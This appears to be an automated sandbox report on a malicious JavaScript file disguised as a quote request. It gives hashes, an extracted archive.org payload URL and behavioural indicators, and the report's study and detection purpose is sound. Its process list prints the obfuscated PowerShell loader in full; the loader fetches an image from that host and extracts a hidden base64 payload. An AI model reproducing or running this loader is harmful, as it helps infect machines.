Analysis
-
max time kernel
11s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
29/08/2024, 05:55
Static task
static1
Behavioral task
behavioral1
Sample
RFQ-MR-24-09101 SPS.js
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
RFQ-MR-24-09101 SPS.js
Resource
win10v2004-20240802-en
General
-
Target
RFQ-MR-24-09101 SPS.js
-
Size
615KB
-
MD5
816e7f77445ae08cda5ad3346fa8c8ff
-
SHA1
ecb2b271b0b22b962ce264552bc5453eff755d97
-
SHA256
7db5b864d7dc11b7523b182bafd5c9526343bfd9d2443fb0700588754c4cd551
-
SHA512
1924fb265dd4e5e00b9293fce18fe831e2e8e6c5437873b0c6e2b6563204540595d0bea7f74d868a39e1727d77b483b434b48e0f2fcac02c8eeef989110f3423
-
SSDEEP
12288:RvqUGASKJa54+3wlF6vRXUlOe8QkqRH9Dx5Ofk1oeQcaSc8+L2g7UH1sEP0ZNnlX:ZFh4ILqSFq
Malware Config
Extracted
https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg
https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2772 powershell.exe 6 2772 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2716 powershell.exe 2772 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2716 powershell.exe 2772 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2716 powershell.exe Token: SeDebugPrivilege 2772 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2240 wrote to memory of 2716 2240 wscript.exe 29 PID 2240 wrote to memory of 2716 2240 wscript.exe 29 PID 2240 wrote to memory of 2716 2240 wscript.exe 29 PID 2716 wrote to memory of 2772 2716 powershell.exe 31 PID 2716 wrote to memory of 2772 2716 powershell.exe 31 PID 2716 wrote to memory of 2772 2716 powershell.exe 31
Processes
-
C:\Windows\system32\wscript.exewscript.exe "C:\Users\Admin\AppData\Local\Temp\RFQ-MR-24-09101 SPS.js"1⤵
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⼞ ⋄ ⍃ ⨞ ❄Bp⼞ ⋄ ⍃ ⨞ ❄G0⼞ ⋄ ⍃ ⨞ ❄YQBn⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄VQBy⼞ ⋄ ⍃ ⨞ ❄Gw⼞ ⋄ ⍃ ⨞ ❄I⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄9⼞ ⋄ ⍃ ⨞ ❄C⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄JwBo⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄Bw⼞ ⋄ ⍃ ⨞ ❄HM⼞ ⋄ ⍃ ⨞ ❄Og⼞ ⋄ ⍃ ⨞ ❄v⼞ ⋄ ⍃ ⨞ ❄C8⼞ ⋄ ⍃ ⨞ ❄aQBh⼞ ⋄ ⍃ ⨞ ❄DY⼞ ⋄ ⍃ ⨞ ❄M⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄x⼞ ⋄ ⍃ ⨞ ❄DY⼞ ⋄ ⍃ ⨞ ❄M⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄2⼞ ⋄ ⍃ ⨞ ❄C4⼞ ⋄ ⍃ ⨞ ❄dQBz⼞ ⋄ ⍃ ⨞ ❄C4⼞ ⋄ ⍃ ⨞ ❄YQBy⼞ ⋄ ⍃ ⨞ ❄GM⼞ ⋄ ⍃ ⨞ ❄a⼞ ⋄ ⍃ ⨞ ❄Bp⼞ ⋄ ⍃ ⨞ ❄HY⼞ ⋄ ⍃ ⨞ ❄ZQ⼞ ⋄ ⍃ ⨞ ❄u⼞ ⋄ ⍃ ⨞ ❄G8⼞ ⋄ ⍃ ⨞ ❄cgBn⼞ ⋄ ⍃ ⨞ ❄C8⼞ ⋄ ⍃ ⨞ ❄MQ⼞ ⋄ ⍃ ⨞ ❄w⼞ ⋄ ⍃ ⨞ ❄C8⼞ ⋄ ⍃ ⨞ ❄aQB0⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄bQBz⼞ ⋄ ⍃ ⨞ ❄C8⼞ ⋄ ⍃ ⨞ ❄Z⼞ ⋄ ⍃ ⨞ ❄Bl⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄Bo⼞ ⋄ ⍃ ⨞ ❄G4⼞ ⋄ ⍃ ⨞ ❄bwB0⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄Xw⼞ ⋄ ⍃ ⨞ ❄y⼞ ⋄ ⍃ ⨞ ❄D⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄Mg⼞ ⋄ ⍃ ⨞ ❄0⼞ ⋄ ⍃ ⨞ ❄D⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄Nw⼞ ⋄ ⍃ ⨞ ❄v⼞ ⋄ ⍃ ⨞ ❄GQ⼞ ⋄ ⍃ ⨞ ❄ZQBh⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄a⼞ ⋄ ⍃ ⨞ ❄Bu⼞ ⋄ ⍃ ⨞ ❄G8⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄Bl⼞ ⋄ ⍃ ⨞ ❄C4⼞ ⋄ ⍃ ⨞ ❄agBw⼞ ⋄ ⍃ ⨞ ❄Gc⼞ ⋄ ⍃ ⨞ ❄Jw⼞ ⋄ ⍃ ⨞ ❄7⼞ ⋄ ⍃ ⨞ ❄CQ⼞ ⋄ ⍃ ⨞ ❄dwBl⼞ ⋄ ⍃ ⨞ ❄GI⼞ ⋄ ⍃ ⨞ ❄QwBs⼞ ⋄ ⍃ ⨞ ❄Gk⼞ ⋄ ⍃ ⨞ ❄ZQBu⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄I⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄9⼞ ⋄ ⍃ ⨞ ❄C⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄TgBl⼞ ⋄ ⍃ ⨞ ❄Hc⼞ ⋄ ⍃ ⨞ ❄LQBP⼞ ⋄ ⍃ ⨞ ❄GI⼞ ⋄ ⍃ ⨞ ❄agBl⼞ ⋄ ⍃ ⨞ ❄GM⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄g⼞ ⋄ ⍃ ⨞ ❄FM⼞ ⋄ ⍃ ⨞ ❄eQBz⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄ZQBt⼞ ⋄ ⍃ ⨞ ❄C4⼞ ⋄ ⍃ ⨞ ❄TgBl⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄LgBX⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄YgBD⼞ ⋄ ⍃ ⨞ ❄Gw⼞ ⋄ ⍃ ⨞ ❄aQBl⼞ ⋄ ⍃ ⨞ ❄G4⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄7⼞ ⋄ ⍃ ⨞ ❄CQ⼞ ⋄ ⍃ ⨞ ❄aQBt⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄ZwBl⼞ ⋄ ⍃ ⨞ ❄EI⼞ ⋄ ⍃ ⨞ ❄eQB0⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄cw⼞ ⋄ ⍃ ⨞ ❄g⼞ ⋄ ⍃ ⨞ ❄D0⼞ ⋄ ⍃ ⨞ ❄I⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄k⼞ ⋄ ⍃ ⨞ ❄Hc⼞ ⋄ ⍃ ⨞ ❄ZQBi⼞ ⋄ ⍃ ⨞ ❄EM⼞ ⋄ ⍃ ⨞ ❄b⼞ ⋄ ⍃ ⨞ ❄Bp⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄bgB0⼞ ⋄ ⍃ ⨞ ❄C4⼞ ⋄ ⍃ ⨞ ❄R⼞ ⋄ ⍃ ⨞ ❄Bv⼞ ⋄ ⍃ ⨞ ❄Hc⼞ ⋄ ⍃ ⨞ ❄bgBs⼞ ⋄ ⍃ ⨞ ❄G8⼞ ⋄ ⍃ ⨞ ❄YQBk⼞ ⋄ ⍃ ⨞ ❄EQ⼞ ⋄ ⍃ ⨞ ❄YQB0⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄K⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄k⼞ ⋄ ⍃ ⨞ ❄Gk⼞ ⋄ ⍃ ⨞ ❄bQBh⼞ ⋄ ⍃ ⨞ ❄Gc⼞ ⋄ ⍃ ⨞ ❄ZQBV⼞ ⋄ ⍃ ⨞ ❄HI⼞ ⋄ ⍃ ⨞ ❄b⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄p⼞ ⋄ ⍃ ⨞ ❄Ds⼞ ⋄ ⍃ ⨞ ❄J⼞ ⋄ ⍃ ⨞ ❄Bp⼞ ⋄ ⍃ ⨞ ❄G0⼞ ⋄ ⍃ ⨞ ❄YQBn⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄V⼞ ⋄ ⍃ ⨞ ❄Bl⼞ ⋄ ⍃ ⨞ ❄Hg⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄g⼞ ⋄ ⍃ ⨞ ❄D0⼞ ⋄ ⍃ ⨞ ❄I⼞ ⋄ ⍃ ⨞ ❄Bb⼞ ⋄ ⍃ ⨞ ❄FM⼞ ⋄ ⍃ ⨞ ❄eQBz⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄ZQBt⼞ ⋄ ⍃ ⨞ ❄C4⼞ ⋄ ⍃ ⨞ ❄V⼞ ⋄ ⍃ ⨞ ❄Bl⼞ ⋄ ⍃ ⨞ ❄Hg⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄u⼞ ⋄ ⍃ ⨞ ❄EU⼞ ⋄ ⍃ ⨞ ❄bgBj⼞ ⋄ ⍃ ⨞ ❄G8⼞ ⋄ ⍃ ⨞ ❄Z⼞ ⋄ ⍃ ⨞ ❄Bp⼞ ⋄ ⍃ ⨞ ❄G4⼞ ⋄ ⍃ ⨞ ❄ZwBd⼞ ⋄ ⍃ ⨞ ❄Do⼞ ⋄ ⍃ ⨞ ❄OgBV⼞ ⋄ ⍃ ⨞ ❄FQ⼞ ⋄ ⍃ ⨞ ❄Rg⼞ ⋄ ⍃ ⨞ ❄4⼞ ⋄ ⍃ ⨞ ❄C4⼞ ⋄ ⍃ ⨞ ❄RwBl⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄UwB0⼞ ⋄ ⍃ ⨞ ❄HI⼞ ⋄ ⍃ ⨞ ❄aQBu⼞ ⋄ ⍃ ⨞ ❄Gc⼞ ⋄ ⍃ ⨞ ❄K⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄k⼞ ⋄ ⍃ ⨞ ❄Gk⼞ ⋄ ⍃ ⨞ ❄bQBh⼞ ⋄ ⍃ ⨞ ❄Gc⼞ ⋄ ⍃ ⨞ ❄ZQBC⼞ ⋄ ⍃ ⨞ ❄Hk⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄Bl⼞ ⋄ ⍃ ⨞ ❄HM⼞ ⋄ ⍃ ⨞ ❄KQ⼞ ⋄ ⍃ ⨞ ❄7⼞ ⋄ ⍃ ⨞ ❄CQ⼞ ⋄ ⍃ ⨞ ❄cwB0⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄cgB0⼞ ⋄ ⍃ ⨞ ❄EY⼞ ⋄ ⍃ ⨞ ❄b⼞ ⋄ ⍃ ⨞ ❄Bh⼞ ⋄ ⍃ ⨞ ❄Gc⼞ ⋄ ⍃ ⨞ ❄I⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄9⼞ ⋄ ⍃ ⨞ ❄C⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄Jw⼞ ⋄ ⍃ ⨞ ❄8⼞ ⋄ ⍃ ⨞ ❄Dw⼞ ⋄ ⍃ ⨞ ❄QgBB⼞ ⋄ ⍃ ⨞ ❄FM⼞ ⋄ ⍃ ⨞ ❄RQ⼞ ⋄ ⍃ ⨞ ❄2⼞ ⋄ ⍃ ⨞ ❄DQ⼞ ⋄ ⍃ ⨞ ❄XwBT⼞ ⋄ ⍃ ⨞ ❄FQ⼞ ⋄ ⍃ ⨞ ❄QQBS⼞ ⋄ ⍃ ⨞ ❄FQ⼞ ⋄ ⍃ ⨞ ❄Pg⼞ ⋄ ⍃ ⨞ ❄+⼞ ⋄ ⍃ ⨞ ❄Cc⼞ ⋄ ⍃ ⨞ ❄Ow⼞ ⋄ ⍃ ⨞ ❄k⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄bgBk⼞ ⋄ ⍃ ⨞ ❄EY⼞ ⋄ ⍃ ⨞ ❄b⼞ ⋄ ⍃ ⨞ ❄Bh⼞ ⋄ ⍃ ⨞ ❄Gc⼞ ⋄ ⍃ ⨞ ❄I⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄9⼞ ⋄ ⍃ ⨞ ❄C⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄Jw⼞ ⋄ ⍃ ⨞ ❄8⼞ ⋄ ⍃ ⨞ ❄Dw⼞ ⋄ ⍃ ⨞ ❄QgBB⼞ ⋄ ⍃ ⨞ ❄FM⼞ ⋄ ⍃ ⨞ ❄RQ⼞ ⋄ ⍃ ⨞ ❄2⼞ ⋄ ⍃ ⨞ ❄DQ⼞ ⋄ ⍃ ⨞ ❄XwBF⼞ ⋄ ⍃ ⨞ ❄E4⼞ ⋄ ⍃ ⨞ ❄R⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄+⼞ ⋄ ⍃ ⨞ ❄D4⼞ ⋄ ⍃ ⨞ ❄Jw⼞ ⋄ ⍃ ⨞ ❄7⼞ ⋄ ⍃ ⨞ ❄CQ⼞ ⋄ ⍃ ⨞ ❄cwB0⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄cgB0⼞ ⋄ ⍃ ⨞ ❄Ek⼞ ⋄ ⍃ ⨞ ❄bgBk⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄e⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄g⼞ ⋄ ⍃ ⨞ ❄D0⼞ ⋄ ⍃ ⨞ ❄I⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄k⼞ ⋄ ⍃ ⨞ ❄Gk⼞ ⋄ ⍃ ⨞ ❄bQBh⼞ ⋄ ⍃ ⨞ ❄Gc⼞ ⋄ ⍃ ⨞ ❄ZQBU⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄e⼞ ⋄ ⍃ ⨞ ❄B0⼞ ⋄ ⍃ ⨞ ❄C4⼞ ⋄ ⍃ ⨞ ❄SQBu⼞ ⋄ ⍃ ⨞ ❄GQ⼞ ⋄ ⍃ ⨞ ❄ZQB4⼞ ⋄ ⍃ ⨞ ❄E8⼞ ⋄ ⍃ ⨞ ❄Zg⼞ ⋄ ⍃ ⨞ ❄o⼞ ⋄ ⍃ ⨞ ❄CQ⼞ ⋄ ⍃ ⨞ ❄cwB0⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄cgB0⼞ ⋄ ⍃ ⨞ ❄EY⼞ ⋄ ⍃ ⨞ ❄b⼞ ⋄ ⍃ ⨞ ❄Bh⼞ ⋄ ⍃ ⨞ ❄Gc⼞ ⋄ ⍃ ⨞ ❄KQ⼞ ⋄ ⍃ ⨞ ❄7⼞ ⋄ ⍃ ⨞ ❄CQ⼞ ⋄ ⍃ ⨞ ❄ZQBu⼞ ⋄ ⍃ ⨞ ❄GQ⼞ ⋄ ⍃ ⨞ ❄SQBu⼞ ⋄ ⍃ ⨞ ❄GQ⼞ ⋄ ⍃ ⨞ ❄ZQB4⼞ ⋄ ⍃ ⨞ ❄C⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄PQ⼞ ⋄ ⍃ ⨞ ❄g⼞ ⋄ ⍃ ⨞ ❄CQ⼞ ⋄ ⍃ ⨞ ❄aQBt⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄ZwBl⼞ ⋄ ⍃ ⨞ ❄FQ⼞ ⋄ ⍃ ⨞ ❄ZQB4⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄LgBJ⼞ ⋄ ⍃ ⨞ ❄G4⼞ ⋄ ⍃ ⨞ ❄Z⼞ ⋄ ⍃ ⨞ ❄Bl⼞ ⋄ ⍃ ⨞ ❄Hg⼞ ⋄ ⍃ ⨞ ❄TwBm⼞ ⋄ ⍃ ⨞ ❄Cg⼞ ⋄ ⍃ ⨞ ❄J⼞ ⋄ ⍃ ⨞ ❄Bl⼞ ⋄ ⍃ ⨞ ❄G4⼞ ⋄ ⍃ ⨞ ❄Z⼞ ⋄ ⍃ ⨞ ❄BG⼞ ⋄ ⍃ ⨞ ❄Gw⼞ ⋄ ⍃ ⨞ ❄YQBn⼞ ⋄ ⍃ ⨞ ❄Ck⼞ ⋄ ⍃ ⨞ ❄Ow⼞ ⋄ ⍃ ⨞ ❄k⼞ ⋄ ⍃ ⨞ ❄HM⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄Bh⼞ ⋄ ⍃ ⨞ ❄HI⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄BJ⼞ ⋄ ⍃ ⨞ ❄G4⼞ ⋄ ⍃ ⨞ ❄Z⼞ ⋄ ⍃ ⨞ ❄Bl⼞ ⋄ ⍃ ⨞ ❄Hg⼞ ⋄ ⍃ ⨞ ❄I⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄t⼞ ⋄ ⍃ ⨞ ❄Gc⼞ ⋄ ⍃ ⨞ ❄ZQ⼞ ⋄ ⍃ ⨞ ❄g⼞ ⋄ ⍃ ⨞ ❄D⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄I⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄t⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄bgBk⼞ ⋄ ⍃ ⨞ ❄C⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄J⼞ ⋄ ⍃ ⨞ ❄Bl⼞ ⋄ ⍃ ⨞ ❄G4⼞ ⋄ ⍃ ⨞ ❄Z⼞ ⋄ ⍃ ⨞ ❄BJ⼞ ⋄ ⍃ ⨞ ❄G4⼞ ⋄ ⍃ ⨞ ❄Z⼞ ⋄ ⍃ ⨞ ❄Bl⼞ ⋄ ⍃ ⨞ ❄Hg⼞ ⋄ ⍃ ⨞ ❄I⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄t⼞ ⋄ ⍃ ⨞ ❄Gc⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄g⼞ ⋄ ⍃ ⨞ ❄CQ⼞ ⋄ ⍃ ⨞ ❄cwB0⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄cgB0⼞ ⋄ ⍃ ⨞ ❄Ek⼞ ⋄ ⍃ ⨞ ❄bgBk⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄e⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄7⼞ ⋄ ⍃ ⨞ ❄CQ⼞ ⋄ ⍃ ⨞ ❄cwB0⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄cgB0⼞ ⋄ ⍃ ⨞ ❄Ek⼞ ⋄ ⍃ ⨞ ❄bgBk⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄e⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄g⼞ ⋄ ⍃ ⨞ ❄Cs⼞ ⋄ ⍃ ⨞ ❄PQ⼞ ⋄ ⍃ ⨞ ❄g⼞ ⋄ ⍃ ⨞ ❄CQ⼞ ⋄ ⍃ ⨞ ❄cwB0⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄cgB0⼞ ⋄ ⍃ ⨞ ❄EY⼞ ⋄ ⍃ ⨞ ❄b⼞ ⋄ ⍃ ⨞ ❄Bh⼞ ⋄ ⍃ ⨞ ❄Gc⼞ ⋄ ⍃ ⨞ ❄LgBM⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄bgBn⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄a⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄7⼞ ⋄ ⍃ ⨞ ❄CQ⼞ ⋄ ⍃ ⨞ ❄YgBh⼞ ⋄ ⍃ ⨞ ❄HM⼞ ⋄ ⍃ ⨞ ❄ZQ⼞ ⋄ ⍃ ⨞ ❄2⼞ ⋄ ⍃ ⨞ ❄DQ⼞ ⋄ ⍃ ⨞ ❄T⼞ ⋄ ⍃ ⨞ ❄Bl⼞ ⋄ ⍃ ⨞ ❄G4⼞ ⋄ ⍃ ⨞ ❄ZwB0⼞ ⋄ ⍃ ⨞ ❄Gg⼞ ⋄ ⍃ ⨞ ❄I⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄9⼞ ⋄ ⍃ ⨞ ❄C⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄J⼞ ⋄ ⍃ ⨞ ❄Bl⼞ ⋄ ⍃ ⨞ ❄G4⼞ ⋄ ⍃ ⨞ ❄Z⼞ ⋄ ⍃ ⨞ ❄BJ⼞ ⋄ ⍃ ⨞ ❄G4⼞ ⋄ ⍃ ⨞ ❄Z⼞ ⋄ ⍃ ⨞ ❄Bl⼞ ⋄ ⍃ ⨞ ❄Hg⼞ ⋄ ⍃ ⨞ ❄I⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄t⼞ ⋄ ⍃ ⨞ ❄C⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄J⼞ ⋄ ⍃ ⨞ ❄Bz⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄YQBy⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄SQBu⼞ ⋄ ⍃ ⨞ ❄GQ⼞ ⋄ ⍃ ⨞ ❄ZQB4⼞ ⋄ ⍃ ⨞ ❄Ds⼞ ⋄ ⍃ ⨞ ❄J⼞ ⋄ ⍃ ⨞ ❄Bi⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄cwBl⼞ ⋄ ⍃ ⨞ ❄DY⼞ ⋄ ⍃ ⨞ ❄N⼞ ⋄ ⍃ ⨞ ❄BD⼞ ⋄ ⍃ ⨞ ❄G8⼞ ⋄ ⍃ ⨞ ❄bQBt⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄bgBk⼞ ⋄ ⍃ ⨞ ❄C⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄PQ⼞ ⋄ ⍃ ⨞ ❄g⼞ ⋄ ⍃ ⨞ ❄CQ⼞ ⋄ ⍃ ⨞ ❄aQBt⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄ZwBl⼞ ⋄ ⍃ ⨞ ❄FQ⼞ ⋄ ⍃ ⨞ ❄ZQB4⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄LgBT⼞ ⋄ ⍃ ⨞ ❄HU⼞ ⋄ ⍃ ⨞ ❄YgBz⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄cgBp⼞ ⋄ ⍃ ⨞ ❄G4⼞ ⋄ ⍃ ⨞ ❄Zw⼞ ⋄ ⍃ ⨞ ❄o⼞ ⋄ ⍃ ⨞ ❄CQ⼞ ⋄ ⍃ ⨞ ❄cwB0⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄cgB0⼞ ⋄ ⍃ ⨞ ❄Ek⼞ ⋄ ⍃ ⨞ ❄bgBk⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄e⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄s⼞ ⋄ ⍃ ⨞ ❄C⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄J⼞ ⋄ ⍃ ⨞ ❄Bi⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄cwBl⼞ ⋄ ⍃ ⨞ ❄DY⼞ ⋄ ⍃ ⨞ ❄N⼞ ⋄ ⍃ ⨞ ❄BM⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄bgBn⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄a⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄p⼞ ⋄ ⍃ ⨞ ❄Ds⼞ ⋄ ⍃ ⨞ ❄J⼞ ⋄ ⍃ ⨞ ❄Bj⼞ ⋄ ⍃ ⨞ ❄G8⼞ ⋄ ⍃ ⨞ ❄bQBt⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄bgBk⼞ ⋄ ⍃ ⨞ ❄EI⼞ ⋄ ⍃ ⨞ ❄eQB0⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄cw⼞ ⋄ ⍃ ⨞ ❄g⼞ ⋄ ⍃ ⨞ ❄D0⼞ ⋄ ⍃ ⨞ ❄I⼞ ⋄ ⍃ ⨞ ❄Bb⼞ ⋄ ⍃ ⨞ ❄FM⼞ ⋄ ⍃ ⨞ ❄eQBz⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄ZQBt⼞ ⋄ ⍃ ⨞ ❄C4⼞ ⋄ ⍃ ⨞ ❄QwBv⼞ ⋄ ⍃ ⨞ ❄G4⼞ ⋄ ⍃ ⨞ ❄dgBl⼞ ⋄ ⍃ ⨞ ❄HI⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄Bd⼞ ⋄ ⍃ ⨞ ❄Do⼞ ⋄ ⍃ ⨞ ❄OgBG⼞ ⋄ ⍃ ⨞ ❄HI⼞ ⋄ ⍃ ⨞ ❄bwBt⼞ ⋄ ⍃ ⨞ ❄EI⼞ ⋄ ⍃ ⨞ ❄YQBz⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄Ng⼞ ⋄ ⍃ ⨞ ❄0⼞ ⋄ ⍃ ⨞ ❄FM⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄By⼞ ⋄ ⍃ ⨞ ❄Gk⼞ ⋄ ⍃ ⨞ ❄bgBn⼞ ⋄ ⍃ ⨞ ❄Cg⼞ ⋄ ⍃ ⨞ ❄J⼞ ⋄ ⍃ ⨞ ❄Bi⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ 